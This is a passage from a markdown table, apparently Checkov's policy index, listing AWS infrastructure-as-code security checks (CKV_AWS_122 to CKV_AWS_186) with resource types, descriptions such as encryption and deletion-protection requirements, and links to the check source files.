[ConfigConfgurationAggregatorAllRegions.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ConfigConfgurationAggregatorAllRegions.py) | -| 463 | CKV_AWS_122 | resource | aws_sagemaker_notebook_instance | Ensure that direct internet access is disabled for an Amazon SageMaker Notebook Instance | Terraform | [SageMakerInternetAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SageMakerInternetAccessDisabled.py) | -| 464 | CKV_AWS_123 | resource | AWS::EC2::VPCEndpointService | Ensure that VPC Endpoint Service is configured for Manual Acceptance | Cloudformation | [VPCEndpointAcceptanceConfigured.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/VPCEndpointAcceptanceConfigured.py) | -| 465 | CKV_AWS_123 | resource | aws_vpc_endpoint_service | Ensure that VPC Endpoint Service is configured for Manual Acceptance | Terraform | [VPCEndpointAcceptanceConfigured.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/VPCEndpointAcceptanceConfigured.py) | -| 466 | CKV_AWS_124 | resource | aws_cloudformation_stack | Ensure that CloudFormation stacks are sending event notifications to an SNS topic | Terraform | [CloudformationStackNotificationArns.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudformationStackNotificationArns.py) | -| 467 | CKV_AWS_126 | resource | aws_instance | Ensure that detailed monitoring is enabled for EC2 instances | Terraform | [EC2DetailedMonitoringEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EC2DetailedMonitoringEnabled.py) | -| 468 | CKV_AWS_127 | resource | aws_elb | Ensure that Elastic Load Balancer(s) uses SSL certificates provided by AWS Certificate Manager | Terraform | 
[ELBUsesSSL.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ELBUsesSSL.py) | -| 469 | CKV_AWS_129 | resource | aws_db_instance | Ensure that respective logs of Amazon Relational Database Service (Amazon RDS) are enabled | Terraform | [DBInstanceLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DBInstanceLogging.py) | -| 470 | CKV_AWS_130 | resource | aws_subnet | Ensure VPC subnets do not assign public IP by default | Terraform | [SubnetPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SubnetPublicIP.py) | -| 471 | CKV_AWS_131 | resource | AWS::ElasticLoadBalancingV2::LoadBalancer | Ensure that ALB drops HTTP headers | Cloudformation | [ALBDropHttpHeaders.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ALBDropHttpHeaders.py) | -| 472 | CKV_AWS_131 | resource | aws_alb | Ensure that ALB drops HTTP headers | Terraform | [ALBDropHttpHeaders.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ALBDropHttpHeaders.py) | -| 473 | CKV_AWS_131 | resource | aws_lb | Ensure that ALB drops HTTP headers | Terraform | [ALBDropHttpHeaders.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ALBDropHttpHeaders.py) | -| 474 | CKV_AWS_133 | resource | aws_db_instance | Ensure that RDS instances has backup policy | Terraform | [DBInstanceBackupRetentionPeriod.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DBInstanceBackupRetentionPeriod.py) | -| 475 | CKV_AWS_133 | resource | aws_rds_cluster | Ensure that RDS instances has backup policy | Terraform | [DBInstanceBackupRetentionPeriod.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DBInstanceBackupRetentionPeriod.py) | -| 476 | CKV_AWS_134 | resource | aws_elasticache_cluster | 
Ensure that Amazon ElastiCache Redis clusters have automatic backup turned on | Terraform | [ElasticCacheAutomaticBackup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticCacheAutomaticBackup.py) | -| 477 | CKV_AWS_135 | resource | [?"amazon.aws.ec2_instance" != null][] | Ensure that EC2 is EBS optimized | Ansible | [EC2EBSOptimized.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2EBSOptimized.py) | -| 478 | CKV_AWS_135 | resource | [?"ec2_instance" != null][] | Ensure that EC2 is EBS optimized | Ansible | [EC2EBSOptimized.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2EBSOptimized.py) | -| 479 | CKV_AWS_135 | resource | [].block[?"amazon.aws.ec2_instance" != null][] | Ensure that EC2 is EBS optimized | Ansible | [EC2EBSOptimized.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2EBSOptimized.py) | -| 480 | CKV_AWS_135 | resource | [].block[?"ec2_instance" != null][] | Ensure that EC2 is EBS optimized | Ansible | [EC2EBSOptimized.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2EBSOptimized.py) | -| 481 | CKV_AWS_135 | resource | [].block[].block[?"amazon.aws.ec2_instance" != null][] | Ensure that EC2 is EBS optimized | Ansible | [EC2EBSOptimized.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2EBSOptimized.py) | -| 482 | CKV_AWS_135 | resource | [].block[].block[?"ec2_instance" != null][] | Ensure that EC2 is EBS optimized | Ansible | [EC2EBSOptimized.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2EBSOptimized.py) | -| 483 | CKV_AWS_135 | resource | [].block[].block[].block[?"amazon.aws.ec2_instance" != null][] | Ensure that EC2 is EBS optimized | Ansible | [EC2EBSOptimized.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2EBSOptimized.py) 
| -| 484 | CKV_AWS_135 | resource | [].block[].block[].block[?"ec2_instance" != null][] | Ensure that EC2 is EBS optimized | Ansible | [EC2EBSOptimized.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2EBSOptimized.py) | -| 485 | CKV_AWS_135 | resource | [].tasks[?"amazon.aws.ec2_instance" != null][] | Ensure that EC2 is EBS optimized | Ansible | [EC2EBSOptimized.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2EBSOptimized.py) | -| 486 | CKV_AWS_135 | resource | [].tasks[?"ec2_instance" != null][] | Ensure that EC2 is EBS optimized | Ansible | [EC2EBSOptimized.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2EBSOptimized.py) | -| 487 | CKV_AWS_135 | resource | [].tasks[].block[?"amazon.aws.ec2_instance" != null][] | Ensure that EC2 is EBS optimized | Ansible | [EC2EBSOptimized.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2EBSOptimized.py) | -| 488 | CKV_AWS_135 | resource | [].tasks[].block[?"ec2_instance" != null][] | Ensure that EC2 is EBS optimized | Ansible | [EC2EBSOptimized.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2EBSOptimized.py) | -| 489 | CKV_AWS_135 | resource | [].tasks[].block[].block[?"amazon.aws.ec2_instance" != null][] | Ensure that EC2 is EBS optimized | Ansible | [EC2EBSOptimized.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2EBSOptimized.py) | -| 490 | CKV_AWS_135 | resource | [].tasks[].block[].block[?"ec2_instance" != null][] | Ensure that EC2 is EBS optimized | Ansible | [EC2EBSOptimized.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2EBSOptimized.py) | -| 491 | CKV_AWS_135 | resource | [].tasks[].block[].block[].block[?"amazon.aws.ec2_instance" != null][] | Ensure that EC2 is EBS optimized | Ansible | 
[EC2EBSOptimized.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2EBSOptimized.py) | -| 492 | CKV_AWS_135 | resource | [].tasks[].block[].block[].block[?"ec2_instance" != null][] | Ensure that EC2 is EBS optimized | Ansible | [EC2EBSOptimized.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2EBSOptimized.py) | -| 493 | CKV_AWS_135 | resource | aws_instance | Ensure that EC2 is EBS optimized | Terraform | [EC2EBSOptimized.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EC2EBSOptimized.py) | -| 494 | CKV_AWS_136 | resource | AWS::ECR::Repository | Ensure that ECR repositories are encrypted using KMS | Cloudformation | [ECRRepositoryEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ECRRepositoryEncrypted.py) | -| 495 | CKV_AWS_136 | resource | aws_ecr_repository | Ensure that ECR repositories are encrypted using KMS | Terraform | [ECRRepositoryEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ECRRepositoryEncrypted.py) | -| 496 | CKV_AWS_137 | resource | aws_elasticsearch_domain | Ensure that Elasticsearch is configured inside a VPC | Terraform | [ElasticsearchInVPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchInVPC.py) | -| 497 | CKV_AWS_137 | resource | aws_opensearch_domain | Ensure that Elasticsearch is configured inside a VPC | Terraform | [ElasticsearchInVPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchInVPC.py) | -| 498 | CKV_AWS_138 | resource | aws_elb | Ensure that ELB is cross-zone-load-balancing enabled | Terraform | [ELBCrossZoneEnable.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ELBCrossZoneEnable.py) | -| 499 | CKV_AWS_139 | resource | aws_rds_cluster | Ensure 
that RDS clusters have deletion protection enabled | Terraform | [RDSDeletionProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSDeletionProtection.py) | -| 500 | CKV_AWS_140 | resource | aws_rds_global_cluster | Ensure that RDS global clusters are encrypted | Terraform | [RDSClusterEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSClusterEncrypted.py) | -| 501 | CKV_AWS_141 | resource | aws_redshift_cluster | Ensured that Redshift cluster allowing version upgrade by default | Terraform | [RedshiftClusterAllowVersionUpgrade.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RedshiftClusterAllowVersionUpgrade.py) | -| 502 | CKV_AWS_142 | resource | aws_redshift_cluster | Ensure that Redshift cluster is encrypted by KMS | Terraform | [RedshiftClusterKMSKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RedshiftClusterKMSKey.py) | -| 503 | CKV_AWS_143 | resource | aws_s3_bucket | Ensure that S3 bucket has lock configuration enabled by default | Terraform | [S3BucketObjectLock.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/S3BucketObjectLock.py) | -| 504 | CKV_AWS_144 | resource | aws_s3_bucket | Ensure that S3 bucket has cross-region replication enabled | Terraform | [S3BucketReplicationConfiguration.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3BucketReplicationConfiguration.yaml) | -| 505 | CKV_AWS_144 | resource | aws_s3_bucket_replication_configuration | Ensure that S3 bucket has cross-region replication enabled | Terraform | [S3BucketReplicationConfiguration.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3BucketReplicationConfiguration.yaml) | -| 506 | CKV_AWS_145 | resource | aws_s3_bucket | Ensure that S3 buckets are 
encrypted with KMS by default | Terraform | [S3KMSEncryptedByDefault.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3KMSEncryptedByDefault.yaml) | -| 507 | CKV_AWS_145 | resource | aws_s3_bucket_server_side_encryption_configuration | Ensure that S3 buckets are encrypted with KMS by default | Terraform | [S3KMSEncryptedByDefault.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3KMSEncryptedByDefault.yaml) | -| 508 | CKV_AWS_146 | resource | aws_db_cluster_snapshot | Ensure that RDS database cluster snapshot is encrypted | Terraform | [RDSClusterSnapshotEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSClusterSnapshotEncrypted.py) | -| 509 | CKV_AWS_147 | resource | aws_codebuild_project | Ensure that CodeBuild projects are encrypted using CMK | Terraform | [CodebuildUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CodebuildUsesCMK.py) | -| 510 | CKV_AWS_148 | resource | aws_default_vpc | Ensure no default VPC is planned to be provisioned | Terraform | [VPCDefaultNetwork.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/VPCDefaultNetwork.py) | -| 511 | CKV_AWS_149 | resource | AWS::SecretsManager::Secret | Ensure that Secrets Manager secret is encrypted using KMS CMK | Cloudformation | [SecretManagerSecretEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/SecretManagerSecretEncrypted.py) | -| 512 | CKV_AWS_149 | resource | aws_secretsmanager_secret | Ensure that Secrets Manager secret is encrypted using KMS CMK | Terraform | [SecretManagerSecretEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecretManagerSecretEncrypted.py) | -| 513 | CKV_AWS_150 | resource | aws_alb | Ensure that Load Balancer has deletion 
protection enabled | Terraform | [LBDeletionProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LBDeletionProtection.py) | -| 514 | CKV_AWS_150 | resource | aws_lb | Ensure that Load Balancer has deletion protection enabled | Terraform | [LBDeletionProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LBDeletionProtection.py) | -| 515 | CKV_AWS_152 | resource | aws_alb | Ensure that Load Balancer (Network/Gateway) has cross-zone load balancing enabled | Terraform | [LBCrossZone.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LBCrossZone.py) | -| 516 | CKV_AWS_152 | resource | aws_lb | Ensure that Load Balancer (Network/Gateway) has cross-zone load balancing enabled | Terraform | [LBCrossZone.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LBCrossZone.py) | -| 517 | CKV_AWS_153 | resource | aws_autoscaling_group | Autoscaling groups should supply tags to launch configurations | Terraform | [AutoScalingTagging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AutoScalingTagging.py) | -| 518 | CKV_AWS_154 | resource | AWS::Redshift::Cluster | Ensure Redshift is not deployed outside of a VPC | Cloudformation | [RedshiftInEc2ClassicMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/RedshiftInEc2ClassicMode.py) | -| 519 | CKV_AWS_154 | resource | aws_redshift_cluster | Ensure Redshift is not deployed outside of a VPC | Terraform | [RedshiftInEc2ClassicMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RedshiftInEc2ClassicMode.py) | -| 520 | CKV_AWS_155 | resource | AWS::WorkSpaces::Workspace | Ensure that Workspace user volumes are encrypted | Cloudformation | 
[WorkspaceUserVolumeEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/WorkspaceUserVolumeEncrypted.py) | -| 521 | CKV_AWS_155 | resource | aws_workspaces_workspace | Ensure that Workspace user volumes are encrypted | Terraform | [WorkspaceUserVolumeEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WorkspaceUserVolumeEncrypted.py) | -| 522 | CKV_AWS_156 | resource | AWS::WorkSpaces::Workspace | Ensure that Workspace root volumes are encrypted | Cloudformation | [WorkspaceRootVolumeEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/WorkspaceRootVolumeEncrypted.py) | -| 523 | CKV_AWS_156 | resource | aws_workspaces_workspace | Ensure that Workspace root volumes are encrypted | Terraform | [WorkspaceRootVolumeEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WorkspaceRootVolumeEncrypted.py) | -| 524 | CKV_AWS_157 | resource | AWS::RDS::DBInstance | Ensure that RDS instances have Multi-AZ enabled | Cloudformation | [RDSMultiAZEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/RDSMultiAZEnabled.py) | -| 525 | CKV_AWS_157 | resource | aws_db_instance | Ensure that RDS instances have Multi-AZ enabled | Terraform | [RDSMultiAZEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSMultiAZEnabled.py) | -| 526 | CKV_AWS_158 | resource | AWS::Logs::LogGroup | Ensure that CloudWatch Log Group is encrypted by KMS | Cloudformation | [CloudWatchLogGroupKMSKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/CloudWatchLogGroupKMSKey.py) | -| 527 | CKV_AWS_158 | resource | aws_cloudwatch_log_group | Ensure that CloudWatch Log Group is encrypted by KMS | Terraform | 
[CloudWatchLogGroupKMSKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudWatchLogGroupKMSKey.py) | -| 528 | CKV_AWS_159 | resource | aws_athena_workgroup | Ensure that Athena Workgroup is encrypted | Terraform | [AthenaWorkgroupEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AthenaWorkgroupEncryption.py) | -| 529 | CKV_AWS_160 | resource | AWS::Timestream::Database | Ensure that Timestream database is encrypted with KMS CMK | Cloudformation | [TimestreamDatabaseKMSKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/TimestreamDatabaseKMSKey.py) | -| 530 | CKV_AWS_160 | resource | aws_timestreamwrite_database | Ensure that Timestream database is encrypted with KMS CMK | Terraform | [TimestreamDatabaseKMSKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/TimestreamDatabaseKMSKey.py) | -| 531 | CKV_AWS_161 | resource | AWS::RDS::DBInstance | Ensure RDS database has IAM authentication enabled | Cloudformation | [RDSIAMAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/RDSIAMAuthentication.py) | -| 532 | CKV_AWS_161 | resource | aws_db_instance | Ensure RDS database has IAM authentication enabled | Terraform | [RDSIAMAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSIAMAuthentication.py) | -| 533 | CKV_AWS_162 | resource | AWS::RDS::DBCluster | Ensure RDS cluster has IAM authentication enabled | Cloudformation | [RDSClusterIAMAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/RDSClusterIAMAuthentication.py) | -| 534 | CKV_AWS_162 | resource | aws_rds_cluster | Ensure RDS cluster has IAM authentication enabled | Terraform | 
[RDSClusterIAMAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSClusterIAMAuthentication.py) | -| 535 | CKV_AWS_163 | resource | AWS::ECR::Repository | Ensure ECR image scanning on push is enabled | Cloudformation | [ECRImageScanning.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ECRImageScanning.py) | -| 536 | CKV_AWS_163 | resource | aws_ecr_repository | Ensure ECR image scanning on push is enabled | Terraform | [ECRImageScanning.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ECRImageScanning.py) | -| 537 | CKV_AWS_164 | resource | AWS::Transfer::Server | Ensure Transfer Server is not exposed publicly. | Cloudformation | [TransferServerIsPublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/TransferServerIsPublic.py) | -| 538 | CKV_AWS_164 | resource | aws_transfer_server | Ensure Transfer Server is not exposed publicly. 
| Terraform | [TransferServerIsPublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/TransferServerIsPublic.py) | -| 539 | CKV_AWS_165 | resource | AWS::DynamoDB::GlobalTable | Ensure DynamoDB global table point in time recovery (backup) is enabled | Cloudformation | [DynamodbGlobalTableRecovery.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/DynamodbGlobalTableRecovery.py) | -| 540 | CKV_AWS_165 | resource | aws_dynamodb_global_table | Ensure DynamoDB point in time recovery (backup) is enabled for global tables | Terraform | [DynamoDBGlobalTableRecovery.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DynamoDBGlobalTableRecovery.py) | -| 541 | CKV_AWS_166 | resource | AWS::Backup::BackupVault | Ensure Backup Vault is encrypted at rest using KMS CMK | Cloudformation | [BackupVaultEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/BackupVaultEncrypted.py) | -| 542 | CKV_AWS_166 | resource | aws_backup_vault | Ensure Backup Vault is encrypted at rest using KMS CMK | Terraform | [BackupVaultEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/BackupVaultEncrypted.py) | -| 543 | CKV_AWS_167 | resource | aws_glacier_vault | Ensure Glacier Vault access policy is not public by only allowing specific services or principals to access it | Terraform | [GlacierVaultAnyPrincipal.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/GlacierVaultAnyPrincipal.py) | -| 544 | CKV_AWS_168 | resource | aws_sqs_queue | Ensure SQS queue policy is not public by only allowing specific services or principals to access it | Terraform | [SQSQueuePolicyAnyPrincipal.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SQSQueuePolicyAnyPrincipal.py) | -| 545 | CKV_AWS_168 | 
resource | aws_sqs_queue_policy | Ensure SQS queue policy is not public by only allowing specific services or principals to access it | Terraform | [SQSQueuePolicyAnyPrincipal.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SQSQueuePolicyAnyPrincipal.py) | -| 546 | CKV_AWS_169 | resource | aws_sns_topic_policy | Ensure SNS topic policy is not public by only allowing specific services or principals to access it | Terraform | [SNSTopicPolicyAnyPrincipal.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SNSTopicPolicyAnyPrincipal.py) | -| 547 | CKV_AWS_170 | resource | AWS::QLDB::Ledger | Ensure QLDB ledger permissions mode is set to STANDARD | Cloudformation | [QLDBLedgerPermissionsMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/QLDBLedgerPermissionsMode.py) | -| 548 | CKV_AWS_170 | resource | aws_qldb_ledger | Ensure QLDB ledger permissions mode is set to STANDARD | Terraform | [QLDBLedgerPermissionsMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/QLDBLedgerPermissionsMode.py) | -| 549 | CKV_AWS_171 | resource | aws_emr_security_configuration | Ensure EMR Cluster security configuration encryption is using SSE-KMS | Terraform | [EMRClusterIsEncryptedKMS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EMRClusterIsEncryptedKMS.py) | -| 550 | CKV_AWS_172 | resource | AWS::QLDB::Ledger | Ensure QLDB ledger has deletion protection enabled | Cloudformation | [QLDBLedgerDeletionProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/QLDBLedgerDeletionProtection.py) | -| 551 | CKV_AWS_172 | resource | aws_qldb_ledger | Ensure QLDB ledger has deletion protection enabled | Terraform | 
[QLDBLedgerDeletionProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/QLDBLedgerDeletionProtection.py) | -| 552 | CKV_AWS_173 | resource | AWS::Lambda::Function | Check encryption settings for Lambda environment variable | Cloudformation | [LambdaEnvironmentEncryptionSettings.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/LambdaEnvironmentEncryptionSettings.py) | -| 553 | CKV_AWS_173 | resource | AWS::Serverless::Function | Check encryption settings for Lambda environment variable | Cloudformation | [LambdaEnvironmentEncryptionSettings.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/LambdaEnvironmentEncryptionSettings.py) | -| 554 | CKV_AWS_173 | resource | aws_lambda_function | Check encryption settings for Lambda environmental variable | Terraform | [LambdaEnvironmentEncryptionSettings.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LambdaEnvironmentEncryptionSettings.py) | -| 555 | CKV_AWS_174 | resource | AWS::CloudFront::Distribution | Verify CloudFront Distribution Viewer Certificate is using TLS v1.2 | Cloudformation | [CloudFrontTLS12.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/CloudFrontTLS12.py) | -| 556 | CKV_AWS_174 | resource | aws_cloudfront_distribution | Verify CloudFront Distribution Viewer Certificate is using TLS v1.2 | Terraform | [CloudfrontTLS12.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudfrontTLS12.py) | -| 557 | CKV_AWS_175 | resource | aws_waf_web_acl | Ensure WAF has associated rules | Terraform | [WAFHasAnyRules.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WAFHasAnyRules.py) | -| 558 | CKV_AWS_175 | resource | aws_wafregional_web_acl | Ensure WAF has associated rules | Terraform | 
[WAFHasAnyRules.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WAFHasAnyRules.py) | -| 559 | CKV_AWS_175 | resource | aws_wafv2_web_acl | Ensure WAF has associated rules | Terraform | [WAFHasAnyRules.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WAFHasAnyRules.py) | -| 560 | CKV_AWS_176 | resource | aws_waf_web_acl | Ensure Logging is enabled for WAF Web Access Control Lists | Terraform | [WAFHasLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WAFHasLogs.py) | -| 561 | CKV_AWS_176 | resource | aws_wafregional_web_acl | Ensure Logging is enabled for WAF Web Access Control Lists | Terraform | [WAFHasLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WAFHasLogs.py) | -| 562 | CKV_AWS_177 | resource | aws_kinesis_video_stream | Ensure Kinesis Video Stream is encrypted by KMS using a customer managed Key (CMK) | Terraform | [KinesisVideoEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/KinesisVideoEncryptedWithCMK.py) | -| 563 | CKV_AWS_178 | resource | aws_fsx_ontap_file_system | Ensure fx ontap file system is encrypted by KMS using a customer managed Key (CMK) | Terraform | [FSXOntapFSEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/FSXOntapFSEncryptedWithCMK.py) | -| 564 | CKV_AWS_179 | resource | aws_fsx_windows_file_system | Ensure FSX Windows filesystem is encrypted by KMS using a customer managed Key (CMK) | Terraform | [FSXWindowsFSEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/FSXWindowsFSEncryptedWithCMK.py) | -| 565 | CKV_AWS_180 | resource | aws_imagebuilder_component | Ensure Image Builder component is encrypted by KMS using a customer managed Key (CMK) | Terraform | 
[ImagebuilderComponentEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ImagebuilderComponentEncryptedWithCMK.py) | -| 566 | CKV_AWS_181 | resource | aws_s3_object_copy | Ensure S3 Object Copy is encrypted by KMS using a customer managed Key (CMK) | Terraform | [S3ObjectCopyEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/S3ObjectCopyEncryptedWithCMK.py) | -| 567 | CKV_AWS_182 | resource | aws_docdb_cluster | Ensure DocumentDB is encrypted by KMS using a customer managed Key (CMK) | Terraform | [DocDBEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DocDBEncryptedWithCMK.py) | -| 568 | CKV_AWS_183 | resource | aws_ebs_snapshot_copy | Ensure EBS Snapshot Copy is encrypted by KMS using a customer managed Key (CMK) | Terraform | [EBSSnapshotCopyEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EBSSnapshotCopyEncryptedWithCMK.py) | -| 569 | CKV_AWS_184 | resource | aws_efs_file_system | Ensure resource is encrypted by KMS using a customer managed Key (CMK) | Terraform | [EFSFileSystemEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EFSFileSystemEncryptedWithCMK.py) | -| 570 | CKV_AWS_185 | resource | aws_kinesis_stream | Ensure Kinesis Stream is encrypted by KMS using a customer managed Key (CMK) | Terraform | [KinesisStreamEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/KinesisStreamEncryptedWithCMK.py) | -| 571 | CKV_AWS_186 | resource | aws_s3_bucket_object | Ensure S3 bucket Object is encrypted by KMS using a customer managed Key (CMK) | Terraform | 